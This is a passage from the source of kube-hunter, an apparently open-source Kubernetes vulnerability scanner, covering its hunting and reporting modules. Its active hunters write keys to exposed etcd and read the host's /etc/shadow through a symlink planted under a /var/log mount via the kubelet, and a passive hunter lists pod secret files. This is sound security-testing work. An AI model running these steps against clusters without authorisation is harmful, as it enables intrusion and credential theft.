40 | def execute(self):
41 | try:
42 | logger.debug("Passive hunter is attempting to get server certificate")
43 | addr = (str(self.event.host), self.event.port)
44 | cert = ssl.get_server_certificate(addr)
45 | except ssl.SSLError:
46 | # If the server doesn't offer SSL on this port we won't get a certificate
47 | return
48 | self.examine_certificate(cert)
49 |
50 | def examine_certificate(self, cert):
51 | c = cert.strip(ssl.PEM_HEADER).strip("\n").strip(ssl.PEM_FOOTER).strip("\n")
52 | certdata = base64.b64decode(c)
53 | emails = re.findall(email_pattern, certdata)
54 | for email in emails:
55 | self.publish_event(CertificateEmail(email=email))
56 |
--------------------------------------------------------------------------------
/kube_hunter/modules/hunting/dashboard.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import json
3 | import requests
4 |
5 | from kube_hunter.conf import get_config
6 | from kube_hunter.core.types import Hunter, AccessK8sDashboardTechnique, KubernetesCluster
7 | from kube_hunter.core.events.event_handler import handler
8 | from kube_hunter.core.events.types import Vulnerability, Event
9 | from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent
10 |
11 | logger = logging.getLogger(__name__)
12 |
13 |
14 | class DashboardExposed(Vulnerability, Event):
15 | """All operations on the cluster are exposed"""
16 |
17 | def __init__(self, nodes):
18 | Vulnerability.__init__(
19 | self,
20 | KubernetesCluster,
21 | "Dashboard Exposed",
22 | category=AccessK8sDashboardTechnique,
23 | vid="KHV029",
24 | )
25 | self.evidence = "nodes: {}".format(" ".join(nodes)) if nodes else None
26 |
27 |
28 | @handler.subscribe(KubeDashboardEvent)
29 | class KubeDashboard(Hunter):
30 | """Dashboard Hunting
31 | Hunts open Dashboards, gets the type of nodes in the cluster
32 | """
33 |
34 | def __init__(self, event):
35 | self.event = event
36 |
37 | def get_nodes(self):
38 | config = get_config()
39 | logger.debug("Passive hunter is attempting to get nodes types of the cluster")
40 | r = requests.get(f"http://{self.event.host}:{self.event.port}/api/v1/node", timeout=config.network_timeout)
41 | if r.status_code == 200 and "nodes" in r.text:
42 | return [node["objectMeta"]["name"] for node in json.loads(r.text)["nodes"]]
43 |
44 | def execute(self):
45 | self.publish_event(DashboardExposed(nodes=self.get_nodes()))
46 |
--------------------------------------------------------------------------------
/kube_hunter/modules/hunting/etcd.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import requests
3 |
4 | from kube_hunter.conf import get_config
5 | from kube_hunter.core.events.event_handler import handler
6 | from kube_hunter.core.events.types import Vulnerability, Event, OpenPortEvent
7 | from kube_hunter.core.types import (
8 | ActiveHunter,
9 | Hunter,
10 | KubernetesCluster,
11 | GeneralSensitiveInformationTechnique,
12 | GeneralPersistenceTechnique,
13 | ListK8sSecretsTechnique,
14 | ExposedSensitiveInterfacesTechnique,
15 | )
16 |
17 | logger = logging.getLogger(__name__)
18 | ETCD_PORT = 2379
19 |
20 |
21 | """ Vulnerabilities """
22 |
23 |
24 | class EtcdRemoteWriteAccessEvent(Vulnerability, Event):
25 | """Remote write access might grant an attacker full control over the kubernetes cluster"""
26 |
27 | def __init__(self, write_res):
28 | Vulnerability.__init__(
29 | self,
30 | KubernetesCluster,
31 | name="Etcd Remote Write Access Event",
32 | category=GeneralPersistenceTechnique,
33 | vid="KHV031",
34 | )
35 | self.evidence = write_res
36 |
37 |
38 | class EtcdRemoteReadAccessEvent(Vulnerability, Event):
39 | """Remote read access might expose to an attacker cluster's possible exploits, secrets and more."""
40 |
41 | def __init__(self, keys):
42 | Vulnerability.__init__(
43 | self,
44 | KubernetesCluster,
45 | name="Etcd Remote Read Access Event",
46 | category=ListK8sSecretsTechnique,
47 | vid="KHV032",
48 | )
49 | self.evidence = keys
50 |
51 |
52 | class EtcdRemoteVersionDisclosureEvent(Vulnerability, Event):
53 | """Remote version disclosure might give an attacker a valuable data to attack a cluster"""
54 |
55 | def __init__(self, version):
56 |
57 | Vulnerability.__init__(
58 | self,
59 | KubernetesCluster,
60 | name="Etcd Remote version disclosure",
61 | category=GeneralSensitiveInformationTechnique,
62 | vid="KHV033",
63 | )
64 | self.evidence = version
65 |
66 |
67 | class EtcdAccessEnabledWithoutAuthEvent(Vulnerability, Event):
68 | """Etcd is accessible using HTTP (without authorization and authentication),
69 | it would allow a potential attacker to
70 | gain access to the etcd"""
71 |
72 | def __init__(self, version):
73 | Vulnerability.__init__(
74 | self,
75 | KubernetesCluster,
76 | name="Etcd is accessible using insecure connection (HTTP)",
77 | category=ExposedSensitiveInterfacesTechnique,
78 | vid="KHV034",
79 | )
80 | self.evidence = version
81 |
82 |
83 | # Active Hunter
84 | @handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == ETCD_PORT)
85 | class EtcdRemoteAccessActive(ActiveHunter):
86 | """Etcd Remote Access
87 | Checks for remote write access to etcd, will attempt to add a new key to the etcd DB"""
88 |
89 | def __init__(self, event):
90 | self.event = event
91 | self.write_evidence = ""
92 | self.event.protocol = "https"
93 |
94 | def db_keys_write_access(self):
95 | config = get_config()
96 | logger.debug(f"Trying to write keys remotely on host {self.event.host}")
97 | data = {"value": "remotely written data"}
98 | try:
99 | r = requests.post(
100 | f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys/message",
101 | data=data,
102 | timeout=config.network_timeout,
103 | )
104 | self.write_evidence = r.content if r.status_code == 200 and r.content else False
105 | return self.write_evidence
106 | except requests.exceptions.ConnectionError:
107 | return False
108 |
109 | def execute(self):
110 | if self.db_keys_write_access():
111 | self.publish_event(EtcdRemoteWriteAccessEvent(self.write_evidence))
112 |
113 |
114 | # Passive Hunter
115 | @handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == ETCD_PORT)
116 | class EtcdRemoteAccess(Hunter):
117 | """Etcd Remote Access
118 | Checks for remote availability of etcd, its version, and read access to the DB
119 | """
120 |
121 | def __init__(self, event):
122 | self.event = event
123 | self.version_evidence = ""
124 | self.keys_evidence = ""
125 | self.event.protocol = "https"
126 |
127 | def db_keys_disclosure(self):
128 | config = get_config()
129 | logger.debug(f"{self.event.host} Passive hunter is attempting to read etcd keys remotely")
130 | try:
131 | r = requests.get(
132 | f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys",
133 | verify=False,
134 | timeout=config.network_timeout,
135 | )
136 | self.keys_evidence = r.content if r.status_code == 200 and r.content != "" else False
137 | return self.keys_evidence
138 | except requests.exceptions.ConnectionError:
139 | return False
140 |
141 | def version_disclosure(self):
142 | config = get_config()
143 | logger.debug(f"Trying to check etcd version remotely at {self.event.host}")
144 | try:
145 | r = requests.get(
146 | f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/version",
147 | verify=False,
148 | timeout=config.network_timeout,
149 | )
150 | self.version_evidence = r.content if r.status_code == 200 and r.content else False
151 | return self.version_evidence
152 | except requests.exceptions.ConnectionError:
153 | return False
154 |
155 | def insecure_access(self):
156 | config = get_config()
157 | logger.debug(f"Trying to access etcd insecurely at {self.event.host}")
158 | try:
159 | r = requests.get(
160 | f"http://{self.event.host}:{ETCD_PORT}/version",
161 | verify=False,
162 | timeout=config.network_timeout,
163 | )
164 | return r.content if r.status_code == 200 and r.content else False
165 | except requests.exceptions.ConnectionError:
166 | return False
167 |
168 | def execute(self):
169 | if self.insecure_access(): # make a decision between http and https protocol
170 | self.event.protocol = "http"
171 | if self.version_disclosure():
172 | self.publish_event(EtcdRemoteVersionDisclosureEvent(self.version_evidence))
173 | if self.event.protocol == "http":
174 | self.publish_event(EtcdAccessEnabledWithoutAuthEvent(self.version_evidence))
175 | if self.db_keys_disclosure():
176 | self.publish_event(EtcdRemoteReadAccessEvent(self.keys_evidence))
177 |
--------------------------------------------------------------------------------
/kube_hunter/modules/hunting/mounts.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import re
3 | import uuid
4 |
5 | from kube_hunter.conf import get_config
6 | from kube_hunter.core.events.event_handler import handler
7 | from kube_hunter.core.events.types import Event, Vulnerability
8 | from kube_hunter.core.types import ActiveHunter, Hunter, KubernetesCluster, HostPathMountPrivilegeEscalationTechnique
9 | from kube_hunter.modules.hunting.kubelet import (
10 | ExposedPodsHandler,
11 | ExposedRunHandler,
12 | KubeletHandlers,
13 | )
14 |
15 | logger = logging.getLogger(__name__)
16 |
17 |
18 | class WriteMountToVarLog(Vulnerability, Event):
19 | """A pod can create symlinks in the /var/log directory on the host, which can lead to a root directory traveral"""
20 |
21 | def __init__(self, pods):
22 | Vulnerability.__init__(
23 | self,
24 | KubernetesCluster,
25 | "Pod With Mount To /var/log",
26 | category=HostPathMountPrivilegeEscalationTechnique,
27 | vid="KHV047",
28 | )
29 | self.pods = pods
30 | self.evidence = "pods: {}".format(", ".join(pod["metadata"]["name"] for pod in self.pods))
31 |
32 |
33 | class DirectoryTraversalWithKubelet(Vulnerability, Event):
34 | """An attacker can run commands on pods with mount to /var/log,
35 | and traverse read all files on the host filesystem"""
36 |
37 | def __init__(self, output):
38 | Vulnerability.__init__(
39 | self,
40 | KubernetesCluster,
41 | "Root Traversal Read On The Kubelet",
42 | category=HostPathMountPrivilegeEscalationTechnique,
43 | )
44 | self.output = output
45 | self.evidence = f"output: {self.output}"
46 |
47 |
48 | @handler.subscribe(ExposedPodsHandler)
49 | class VarLogMountHunter(Hunter):
50 | """Mount Hunter - /var/log
51 | Hunt pods that have write access to host's /var/log. in such case,
52 | the pod can traverse read files on the host machine
53 | """
54 |
55 | def __init__(self, event):
56 | self.event = event
57 |
58 | def has_write_mount_to(self, pod_data, path):
59 | """Returns volume for correlated writable mount"""
60 | for volume in pod_data["spec"]["volumes"]:
61 | if "hostPath" in volume:
62 | if "Directory" in volume["hostPath"]["type"]:
63 | if volume["hostPath"]["path"].startswith(path):
64 | return volume
65 |
66 | def execute(self):
67 | pe_pods = []
68 | for pod in self.event.pods:
69 | if self.has_write_mount_to(pod, path="/var/log"):
70 | pe_pods.append(pod)
71 | if pe_pods:
72 | self.publish_event(WriteMountToVarLog(pods=pe_pods))
73 |
74 |
75 | @handler.subscribe_many([ExposedRunHandler, WriteMountToVarLog])
76 | class ProveVarLogMount(ActiveHunter):
77 | """Prove /var/log Mount Hunter
78 | Tries to read /etc/shadow on the host by running commands inside a pod with host mount to /var/log
79 | """
80 |
81 | def __init__(self, event):
82 | self.write_mount_event = self.event.get_by_class(WriteMountToVarLog)
83 | self.event = self.write_mount_event
84 |
85 | self.base_path = f"https://{self.write_mount_event.host}:{self.write_mount_event.port}"
86 |
87 | def run(self, command, container):
88 | run_url = KubeletHandlers.RUN.value.format(
89 | podNamespace=container["namespace"],
90 | podID=container["pod"],
91 | containerName=container["name"],
92 | cmd=command,
93 | )
94 | return self.event.session.post(f"{self.base_path}/{run_url}", verify=False).text
95 |
96 | def mount_path_from_mountname(self, pod, mount_name):
97 | """returns container name, and container mount path correlated to mount_name"""
98 | for container in pod["spec"]["containers"]:
99 | for volume_mount in container["volumeMounts"]:
100 | if volume_mount["name"] == mount_name:
101 | logger.debug(f"yielding {container}")
102 | yield container, volume_mount["mountPath"]
103 |
104 | def traverse_read(self, host_file, container, mount_path, host_path):
105 | """Returns content of file on the host, and cleans trails"""
106 | config = get_config()
107 | symlink_name = str(uuid.uuid4())
108 | # creating symlink to file
109 | self.run(f"ln -s {host_file} {mount_path}/{symlink_name}", container)
110 | # following symlink with kubelet
111 | path_in_logs_endpoint = KubeletHandlers.LOGS.value.format(
112 | path=re.sub(r"^/var/log", "", host_path) + symlink_name
113 | )
114 | content = self.event.session.get(
115 | f"{self.base_path}/{path_in_logs_endpoint}",
116 | verify=False,
117 | timeout=config.network_timeout,
118 | ).text
119 | # removing symlink
120 | self.run(f"rm {mount_path}/{symlink_name}", container=container)
121 | return content
122 |
123 | def execute(self):
124 | for pod, volume in self.write_mount_event.pe_pods():
125 | for container, mount_path in self.mount_path_from_mountname(pod, volume["name"]):
126 | logger.debug("Correlated container to mount_name")
127 | cont = {
128 | "name": container["name"],
129 | "pod": pod["metadata"]["name"],
130 | "namespace": pod["metadata"]["namespace"],
131 | }
132 | try:
133 | output = self.traverse_read(
134 | "/etc/shadow",
135 | container=cont,
136 | mount_path=mount_path,
137 | host_path=volume["hostPath"]["path"],
138 | )
139 | self.publish_event(DirectoryTraversalWithKubelet(output=output))
140 | except Exception:
141 | logger.debug("Could not exploit /var/log", exc_info=True)
142 |
--------------------------------------------------------------------------------
/kube_hunter/modules/hunting/proxy.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import requests
3 |
4 | from enum import Enum
5 |
6 | from kube_hunter.conf import get_config
7 | from kube_hunter.core.events.event_handler import handler
8 | from kube_hunter.core.events.types import Event, Vulnerability, K8sVersionDisclosure
9 | from kube_hunter.core.types import (
10 | ActiveHunter,
11 | Hunter,
12 | KubernetesCluster,
13 | ConnectFromProxyServerTechnique,
14 | )
15 | from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent
16 | from kube_hunter.modules.discovery.proxy import KubeProxyEvent
17 |
18 | logger = logging.getLogger(__name__)
19 |
20 |
21 | class KubeProxyExposed(Vulnerability, Event):
22 | """All operations on the cluster are exposed"""
23 |
24 | def __init__(self):
25 | Vulnerability.__init__(
26 | self,
27 | KubernetesCluster,
28 | "Proxy Exposed",
29 | category=ConnectFromProxyServerTechnique,
30 | vid="KHV049",
31 | )
32 |
33 |
34 | class Service(Enum):
35 | DASHBOARD = "kubernetes-dashboard"
36 |
37 |
38 | @handler.subscribe(KubeProxyEvent)
39 | class KubeProxy(Hunter):
40 | """Proxy Hunting
41 | Hunts for a dashboard behind the proxy
42 | """
43 |
44 | def __init__(self, event):
45 | self.event = event
46 | self.api_url = f"http://{self.event.host}:{self.event.port}/api/v1"
47 |
48 | def execute(self):
49 | self.publish_event(KubeProxyExposed())
50 | for namespace, services in self.services.items():
51 | for service in services:
52 | if service == Service.DASHBOARD.value:
53 | logger.debug(f"Found a dashboard service '{service}'")
54 | # TODO: check if /proxy is a convention on other services
55 | curr_path = f"api/v1/namespaces/{namespace}/services/{service}/proxy"
56 | self.publish_event(KubeDashboardEvent(path=curr_path, secure=False))
57 |
58 | @property
59 | def namespaces(self):
60 | config = get_config()
61 | resource_json = requests.get(f"{self.api_url}/namespaces", timeout=config.network_timeout).json()
62 | return self.extract_names(resource_json)
63 |
64 | @property
65 | def services(self):
66 | config = get_config()
67 | # map between namespaces and service names
68 | services = dict()
69 | for namespace in self.namespaces:
70 | resource_path = f"{self.api_url}/namespaces/{namespace}/services"
71 | resource_json = requests.get(resource_path, timeout=config.network_timeout).json()
72 | services[namespace] = self.extract_names(resource_json)
73 | logger.debug(f"Enumerated services [{' '.join(services)}]")
74 | return services
75 |
76 | @staticmethod
77 | def extract_names(resource_json):
78 | names = list()
79 | for item in resource_json["items"]:
80 | names.append(item["metadata"]["name"])
81 | return names
82 |
83 |
84 | @handler.subscribe(KubeProxyExposed)
85 | class ProveProxyExposed(ActiveHunter):
86 | """Build Date Hunter
87 | Hunts when proxy is exposed, extracts the build date of kubernetes
88 | """
89 |
90 | def __init__(self, event):
91 | self.event = event
92 |
93 | def execute(self):
94 | config = get_config()
95 | version_metadata = requests.get(
96 | f"http://{self.event.host}:{self.event.port}/version",
97 | verify=False,
98 | timeout=config.network_timeout,
99 | ).json()
100 | if "buildDate" in version_metadata:
101 | self.event.evidence = "build date: {}".format(version_metadata["buildDate"])
102 |
103 |
104 | @handler.subscribe(KubeProxyExposed)
105 | class K8sVersionDisclosureProve(ActiveHunter):
106 | """K8s Version Hunter
107 | Hunts Proxy when exposed, extracts the version
108 | """
109 |
110 | def __init__(self, event):
111 | self.event = event
112 |
113 | def execute(self):
114 | config = get_config()
115 | version_metadata = requests.get(
116 | f"http://{self.event.host}:{self.event.port}/version",
117 | verify=False,
118 | timeout=config.network_timeout,
119 | ).json()
120 | if "gitVersion" in version_metadata:
121 | self.publish_event(
122 | K8sVersionDisclosure(
123 | version=version_metadata["gitVersion"],
124 | from_endpoint="/version",
125 | extra_info="on kube-proxy",
126 | category=ConnectFromProxyServerTechnique,
127 | )
128 | )
129 |
--------------------------------------------------------------------------------
/kube_hunter/modules/hunting/secrets.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 |
4 | from kube_hunter.core.events.event_handler import handler
5 | from kube_hunter.core.events.types import Vulnerability, Event
6 | from kube_hunter.core.types import Hunter, KubernetesCluster, AccessContainerServiceAccountTechnique
7 | from kube_hunter.modules.discovery.hosts import RunningAsPodEvent
8 |
9 | logger = logging.getLogger(__name__)
10 |
11 |
12 | class ServiceAccountTokenAccess(Vulnerability, Event):
13 | """Accessing the pod service account token gives an attacker the option to use the server API"""
14 |
15 | def __init__(self, evidence):
16 | Vulnerability.__init__(
17 | self,
18 | KubernetesCluster,
19 | name="Read access to pod's service account token",
20 | category=AccessContainerServiceAccountTechnique,
21 | vid="KHV050",
22 | )
23 | self.evidence = evidence
24 |
25 |
26 | class SecretsAccess(Vulnerability, Event):
27 | """Accessing the pod's secrets within a compromised pod might disclose valuable data to a potential attacker"""
28 |
29 | def __init__(self, evidence):
30 | Vulnerability.__init__(
31 | self,
32 | component=KubernetesCluster,
33 | name="Access to pod's secrets",
34 | category=AccessContainerServiceAccountTechnique,
35 | )
36 | self.evidence = evidence
37 |
38 |
39 | # Passive Hunter
40 | @handler.subscribe(RunningAsPodEvent)
41 | class AccessSecrets(Hunter):
42 | """Access Secrets
43 | Accessing the secrets accessible to the pod"""
44 |
45 | def __init__(self, event):
46 | self.event = event
47 | self.secrets_evidence = ""
48 |
49 | def get_services(self):
50 | logger.debug("Trying to access pod's secrets directory")
51 | # get all files and subdirectories files:
52 | self.secrets_evidence = []
53 | for dirname, _, files in os.walk("/var/run/secrets/"):
54 | for f in files:
55 | self.secrets_evidence.append(os.path.join(dirname, f))
56 | return len(self.secrets_evidence) > 0
57 |
58 | def execute(self):
59 | if self.event.auth_token is not None:
60 | self.publish_event(ServiceAccountTokenAccess(self.event.auth_token))
61 | if self.get_services():
62 | self.publish_event(SecretsAccess(self.secrets_evidence))
63 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from kube_hunter.modules.report.factory import get_reporter, get_dispatcher
3 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/base.py:
--------------------------------------------------------------------------------
1 | from kube_hunter.core.types import Discovery
2 | from kube_hunter.modules.report.collector import (
3 | services,
4 | vulnerabilities,
5 | hunters,
6 | services_lock,
7 | vulnerabilities_lock,
8 | )
9 |
10 | BASE_KB_LINK = "https://avd.aquasec.com/"
11 | FULL_KB_LINK = "https://avd.aquasec.com/kube-hunter/{vid}/"
12 |
13 |
14 | class BaseReporter:
15 | def get_nodes(self):
16 | nodes = list()
17 | node_locations = set()
18 | with services_lock:
19 | for service in services:
20 | node_location = str(service.host)
21 | if node_location not in node_locations:
22 | nodes.append({"type": "Node/Master", "location": node_location})
23 | node_locations.add(node_location)
24 | return nodes
25 |
26 | def get_services(self):
27 | with services_lock:
28 | return [
29 | {"service": service.get_name(), "location": f"{service.host}:{service.port}{service.get_path()}"}
30 | for service in services
31 | ]
32 |
33 | def get_vulnerabilities(self):
34 | with vulnerabilities_lock:
35 | return [
36 | {
37 | "location": vuln.location(),
38 | "vid": vuln.get_vid(),
39 | "category": vuln.category.get_name(),
40 | "severity": vuln.get_severity(),
41 | "vulnerability": vuln.get_name(),
42 | "description": vuln.explain(),
43 | "evidence": str(vuln.evidence),
44 | "avd_reference": FULL_KB_LINK.format(vid=vuln.get_vid().lower()),
45 | "hunter": vuln.hunter.get_name(),
46 | }
47 | for vuln in vulnerabilities
48 | ]
49 |
50 | def get_hunter_statistics(self):
51 | hunters_data = []
52 | for hunter, docs in hunters.items():
53 | if Discovery not in hunter.__mro__:
54 | name, doc = hunter.parse_docs(docs)
55 | hunters_data.append(
56 | {"name": name, "description": doc, "vulnerabilities": hunter.publishedVulnerabilities}
57 | )
58 | return hunters_data
59 |
60 | def get_report(self, *, statistics, **kwargs):
61 | report = {
62 | "nodes": self.get_nodes(),
63 | "services": self.get_services(),
64 | "vulnerabilities": self.get_vulnerabilities(),
65 | }
66 |
67 | if statistics:
68 | report["hunter_statistics"] = self.get_hunter_statistics()
69 |
70 | return report
71 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/collector.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import threading
3 |
4 | from kube_hunter.conf import get_config
5 | from kube_hunter.core.events.event_handler import handler
6 | from kube_hunter.core.events.types import (
7 | Event,
8 | Service,
9 | Vulnerability,
10 | HuntFinished,
11 | HuntStarted,
12 | ReportDispatched,
13 | )
14 |
15 | logger = logging.getLogger(__name__)
16 |
17 | services_lock = threading.Lock()
18 | services = list()
19 | vulnerabilities_lock = threading.Lock()
20 | vulnerabilities = list()
21 | hunters = handler.all_hunters
22 |
23 |
24 | @handler.subscribe(Service)
25 | @handler.subscribe(Vulnerability)
26 | class Collector:
27 | def __init__(self, event=None):
28 | self.event = event
29 |
30 | def execute(self):
31 | """function is called only when collecting data"""
32 | global services
33 | global vulnerabilities
34 | bases = self.event.__class__.__mro__
35 | if Service in bases:
36 | with services_lock:
37 | services.append(self.event)
38 | logger.info(f'Found open service "{self.event.get_name()}" at {self.event.location()}')
39 | elif Vulnerability in bases:
40 | with vulnerabilities_lock:
41 | vulnerabilities.append(self.event)
42 | logger.info(f'Found vulnerability "{self.event.get_name()}" in {self.event.location()}')
43 |
44 |
45 | class TablesPrinted(Event):
46 | pass
47 |
48 |
49 | @handler.subscribe(HuntFinished)
50 | class SendFullReport:
51 | def __init__(self, event):
52 | self.event = event
53 |
54 | def execute(self):
55 | config = get_config()
56 | report = config.reporter.get_report(statistics=config.statistics, mapping=config.mapping)
57 | config.dispatcher.dispatch(report)
58 | handler.publish_event(ReportDispatched())
59 | handler.publish_event(TablesPrinted())
60 |
61 |
62 | @handler.subscribe(HuntStarted)
63 | class StartedInfo:
64 | def __init__(self, event):
65 | self.event = event
66 |
67 | def execute(self):
68 | logger.info("Started hunting")
69 | logger.info("Discovering Open Kubernetes Services")
70 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/dispatchers.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import os
3 | import requests
4 |
5 | logger = logging.getLogger(__name__)
6 |
7 |
8 | class HTTPDispatcher:
9 | def dispatch(self, report):
10 | logger.debug("Dispatching report via HTTP")
11 | dispatch_method = os.environ.get("KUBEHUNTER_HTTP_DISPATCH_METHOD", "POST").upper()
12 | dispatch_url = os.environ.get("KUBEHUNTER_HTTP_DISPATCH_URL", "https://localhost/")
13 | try:
14 | r = requests.request(
15 | dispatch_method, dispatch_url, json=report, headers={"Content-Type": "application/json"}, verify=False
16 | )
17 | r.raise_for_status()
18 | logger.info(f"Report was dispatched to: {dispatch_url}")
19 | logger.debug(f"Dispatch responded {r.status_code} with: {r.text}")
20 |
21 | except requests.HTTPError:
22 | logger.exception(f"Failed making HTTP {dispatch_method} to {dispatch_url}, " f"status code {r.status_code}")
23 | except Exception:
24 | logger.exception(f"Could not dispatch report to {dispatch_url}")
25 |
26 |
27 | class STDOUTDispatcher:
28 | def dispatch(self, report):
29 | logger.debug("Dispatching report via stdout")
30 | print(report)
31 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/factory.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | from kube_hunter.modules.report.json import JSONReporter
4 | from kube_hunter.modules.report.yaml import YAMLReporter
5 | from kube_hunter.modules.report.plain import PlainReporter
6 | from kube_hunter.modules.report.dispatchers import STDOUTDispatcher, HTTPDispatcher
7 |
8 | logger = logging.getLogger(__name__)
9 |
10 | DEFAULT_REPORTER = "plain"
11 | reporters = {
12 | "yaml": YAMLReporter,
13 | "json": JSONReporter,
14 | "plain": PlainReporter,
15 | }
16 |
17 | DEFAULT_DISPATCHER = "stdout"
18 | dispatchers = {
19 | "stdout": STDOUTDispatcher,
20 | "http": HTTPDispatcher,
21 | }
22 |
23 |
24 | def get_reporter(name):
25 | try:
26 | return reporters[name.lower()]()
27 | except KeyError:
28 | logger.warning(f'Unknown reporter "{name}", using f{DEFAULT_REPORTER}')
29 | return reporters[DEFAULT_REPORTER]()
30 |
31 |
32 | def get_dispatcher(name):
33 | try:
34 | return dispatchers[name.lower()]()
35 | except KeyError:
36 | logger.warning(f'Unknown dispatcher "{name}", using {DEFAULT_DISPATCHER}')
37 | return dispatchers[DEFAULT_DISPATCHER]()
38 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/json.py:
--------------------------------------------------------------------------------
1 | import json
2 |
3 | from kube_hunter.modules.report.base import BaseReporter
4 |
5 |
6 | class JSONReporter(BaseReporter):
7 | def get_report(self, **kwargs):
8 | report = super().get_report(**kwargs)
9 | return json.dumps(report)
10 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/plain.py:
--------------------------------------------------------------------------------
1 | from prettytable import ALL, PrettyTable
2 |
3 | from kube_hunter.modules.report.base import BaseReporter, BASE_KB_LINK
4 | from kube_hunter.modules.report.collector import (
5 | services,
6 | vulnerabilities,
7 | hunters,
8 | services_lock,
9 | vulnerabilities_lock,
10 | )
11 |
12 | EVIDENCE_PREVIEW = 100
13 | MAX_TABLE_WIDTH = 20
14 |
15 |
16 | class PlainReporter(BaseReporter):
17 | def get_report(self, *, statistics=None, mapping=None, **kwargs):
18 | """generates report tables"""
19 | output = ""
20 |
21 | with vulnerabilities_lock:
22 | vulnerabilities_len = len(vulnerabilities)
23 |
24 | hunters_len = len(hunters.items())
25 |
26 | with services_lock:
27 | services_len = len(services)
28 |
29 | if services_len:
30 | output += self.nodes_table()
31 | if not mapping:
32 | output += self.services_table()
33 | if vulnerabilities_len:
34 | output += self.vulns_table()
35 | else:
36 | output += "\nNo vulnerabilities were found"
37 | if statistics:
38 | if hunters_len:
39 | output += self.hunters_table()
40 | else:
41 | output += "\nNo hunters were found"
42 | else:
43 | if vulnerabilities_len:
44 | output += self.vulns_table()
45 | output += "\nKube Hunter couldn't find any clusters"
46 | return output
47 |
48 | def nodes_table(self):
49 | nodes_table = PrettyTable(["Type", "Location"], hrules=ALL)
50 | nodes_table.align = "l"
51 | nodes_table.max_width = MAX_TABLE_WIDTH
52 | nodes_table.padding_width = 1
53 | nodes_table.sortby = "Type"
54 | nodes_table.reversesort = True
55 | nodes_table.header_style = "upper"
56 | id_memory = set()
57 | services_lock.acquire()
58 | for service in services:
59 | if service.event_id not in id_memory:
60 | nodes_table.add_row(["Node/Master", service.host])
61 | id_memory.add(service.event_id)
62 | nodes_ret = f"\nNodes\n{nodes_table}\n"
63 | services_lock.release()
64 | return nodes_ret
65 |
66 | def services_table(self):
67 | services_table = PrettyTable(["Service", "Location", "Description"], hrules=ALL)
68 | services_table.align = "l"
69 | services_table.max_width = MAX_TABLE_WIDTH
70 | services_table.padding_width = 1
71 | services_table.sortby = "Service"
72 | services_table.reversesort = True
73 | services_table.header_style = "upper"
74 | with services_lock:
75 | for service in services:
76 | services_table.add_row(
77 | [service.get_name(), f"{service.host}:{service.port}{service.get_path()}", service.explain()]
78 | )
79 | detected_services_ret = f"\nDetected Services\n{services_table}\n"
80 | return detected_services_ret
81 |
82 | def vulns_table(self):
83 | column_names = [
84 | "ID",
85 | "Location",
86 | "MITRE Category",
87 | "Vulnerability",
88 | "Description",
89 | "Evidence",
90 | ]
91 | vuln_table = PrettyTable(column_names, hrules=ALL)
92 | vuln_table.align = "l"
93 | vuln_table.max_width = MAX_TABLE_WIDTH
94 | vuln_table.sortby = "MITRE Category"
95 | vuln_table.reversesort = True
96 | vuln_table.padding_width = 1
97 | vuln_table.header_style = "upper"
98 |
99 | with vulnerabilities_lock:
100 | for vuln in vulnerabilities:
101 | evidence = str(vuln.evidence)
102 | if len(evidence) > EVIDENCE_PREVIEW:
103 | evidence = evidence[:EVIDENCE_PREVIEW] + "..."
104 |
105 | row = [
106 | vuln.get_vid(),
107 | vuln.location(),
108 | vuln.category.get_name(),
109 | vuln.get_name(),
110 | vuln.explain(),
111 | evidence,
112 | ]
113 | vuln_table.add_row(row)
114 | return (
115 | "\nVulnerabilities\n"
116 | "For further information about a vulnerability, search its ID in: \n"
117 | f"{BASE_KB_LINK}\n{vuln_table}\n"
118 | )
119 |
120 | def hunters_table(self):
121 | column_names = ["Name", "Description", "Vulnerabilities"]
122 | hunters_table = PrettyTable(column_names, hrules=ALL)
123 | hunters_table.align = "l"
124 | hunters_table.max_width = MAX_TABLE_WIDTH
125 | hunters_table.sortby = "Name"
126 | hunters_table.reversesort = True
127 | hunters_table.padding_width = 1
128 | hunters_table.header_style = "upper"
129 |
130 | hunter_statistics = self.get_hunter_statistics()
131 | for item in hunter_statistics:
132 | hunters_table.add_row([item.get("name"), item.get("description"), item.get("vulnerabilities")])
133 | return f"\nHunter Statistics\n{hunters_table}\n"
134 |
--------------------------------------------------------------------------------
/kube_hunter/modules/report/yaml.py:
--------------------------------------------------------------------------------
1 | from io import StringIO
2 | from ruamel.yaml import YAML
3 |
4 | from kube_hunter.modules.report.base import BaseReporter
5 |
6 |
7 | class YAMLReporter(BaseReporter):
8 | def get_report(self, **kwargs):
9 | report = super().get_report(**kwargs)
10 | output = StringIO()
11 | yaml = YAML()
12 | yaml.dump(report, output)
13 | return output.getvalue()
14 |
--------------------------------------------------------------------------------
/kube_hunter/plugins/__init__.py:
--------------------------------------------------------------------------------
1 | import pluggy
2 |
3 | from kube_hunter.plugins import hookspecs
4 |
5 | hookimpl = pluggy.HookimplMarker("kube-hunter")
6 |
7 |
8 | def initialize_plugin_manager():
9 | """
10 | Initializes and loads all default and setup implementations for registered plugins
11 |
12 | @return: initialized plugin manager
13 | """
14 | pm = pluggy.PluginManager("kube-hunter")
15 | pm.add_hookspecs(hookspecs)
16 | pm.load_setuptools_entrypoints("kube_hunter")
17 |
